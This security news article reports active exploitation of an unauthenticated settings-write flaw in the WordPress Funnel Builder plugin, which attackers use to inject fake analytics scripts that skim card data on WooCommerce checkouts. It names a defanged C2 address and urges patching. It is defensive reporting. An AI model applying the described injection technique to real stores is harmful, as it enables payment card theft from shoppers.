430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|Apple Fixes WebKit Flaws in iOS and macOS, With Help From AI Tools|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|Apple Fixes WebKit Flaws in iOS and macOS, With Help From AI Tools|
Advertisement

Ad Placeholder

Full Width × 90

Breaking News

Attackers exploit Funnel Builder bug to inject e-skimmers into e-stores

Attackers are exploiting a critical flaw in the WordPress Funnel Builder plugin to inject skimming code into WooCommerce checkout pages. A critical vulnerability in the WordPress Funnel Builder plugin is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages, according to Sansec researchers. Funnel Builder by FunnelKit is a checkout and upsell plugin […]

ShapedPlugin plugin

Attackers are exploiting a critical flaw in the WordPress Funnel Builder plugin to inject skimming code into WooCommerce checkout pages.

A critical vulnerability in the WordPress Funnel Builder plugin is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages, according to Sansec researchers.

Funnel Builder by FunnelKit is a checkout and upsell plugin installed on over 40,000 WooCommerce stores

Attackers injected an e-skimmer code designed to steal customers’ card and payment details during purchases. Website owners using the plugin are urged to apply security updates immediately and review checkout pages for signs of compromise.

“Attackers are planting fake Google Tag Manager scripts into the plugin’s “External Scripts” setting. The injected code looks like ordinary analytics next to the store’s real tags, but loads a payment skimmer that steals credit card numbers, CVVs and billing addresses from checkout.” reads the report published by Sansec.

The researchers state that a critical flaw in the WordPress Funnel Builder plugin lets unauthenticated attackers inject malicious scripts into WooCommerce checkout pages. The vulnerable endpoint fails to verify permissions and allows attackers to modify global plugin settings, including the “External Scripts” option. By planting a malicious <script> tag, attackers can skim payment data from every checkout transaction.

“An unauthenticated request can therefore reach the internal method that writes attacker-controlled data straight into the plugin’s global settings.” continues the report. “Whatever sits in the “External Scripts” setting then gets printed onto every Funnel Builder checkout page, so an attacker can plant a <script> tag that runs on every checkout transaction across the site.”

The patch adds proper permission checks and limits access to approved methods only.

Sansec observed attackers abusing the Funnel Builder flaw to inject malware disguised as a Google Tag Manager or Analytics script. The fake loader silently downloads a second-stage script from an attacker-controlled domain and opens a WebSocket connection to a remote C2 server (“wss://protect-wss[.]com/ws”). Then, a custom payment skimmer is delivered to steal credit card numbers, CVVs, billing addresses, and other customer data during checkout.

Attackers mimic trusted tracking tags to avoid detection.

FunnelKit urged customers to immediately update Funnel Builder to version 3.15.0.3 after discovering a flaw that allowed attackers to inject malicious scripts into checkout pages. Users are also advised to review the plugin’s External Scripts settings and remove any unknown code. Security experts further recommend scanning affected stores to detect skimmers, malware, backdoors, or other signs of compromise.

Sansec also provided indicators of compromise (IoCs).

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, WordPress)